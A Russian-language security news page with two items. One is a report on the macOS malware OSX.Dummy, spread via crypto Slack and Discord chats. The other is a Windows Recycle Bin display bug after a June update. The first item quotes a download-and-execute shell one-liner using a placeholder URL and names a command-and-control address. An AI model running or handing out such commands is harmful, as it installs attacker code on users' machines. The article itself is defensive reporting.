Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

Корзина Windows показывает не те имена файлов после июньского обновления

Очередной Patch Tuesday от Microsoft принёс пользователям Windows новый сюрприз. После установки июньского обновления под номером KB5094126 некоторые владельцы компьютеров заметили странное поведение Корзины. Проблема проявляется при окончательном удалении файлов.

Обычно Windows показывает предупреждение с именем файла, который пользователь собирается стереть навсегда. Теперь же вместо привычного названия система может отображать какой-то внутренний служебный идентификатор.

Выглядит это так, будто Windows внезапно забыла, какой именно файл собирается удалить.

В Microsoft уже подтвердили наличие ошибки. Хорошая новость заключается в том, что речь идёт исключительно о визуальном сбое. Сам файл никуда не исчезает раньше времени, не повреждается и не переименовывается.

Если открыть Корзину, правильное название документа или изображения по-прежнему отображается в списке файлов. Более того, при восстановлении объект возвращается под своим оригинальным именем. То есть проблема затрагивает только окно подтверждения удаления.

Под удар попали практически все актуальные версии Windows, получившие июньские обновления безопасности. Точный список Microsoft пока не публикует, но признаёт, что ошибка носит массовый характер.

Особенно раздражает то, что никакого официального обходного пути для обычных пользователей сейчас нет. Единственный совет — проверять название файла непосредственно в Корзине перед окончательным удалением.

В компании уже работают над фиксом, однако сроки выхода патча пока не называются. Неясно, появится ли он в следующем пакете обновлений или Microsoft выпустит внеплановое исправление раньше.

RSS: Новости на портале Anti-Malware.ru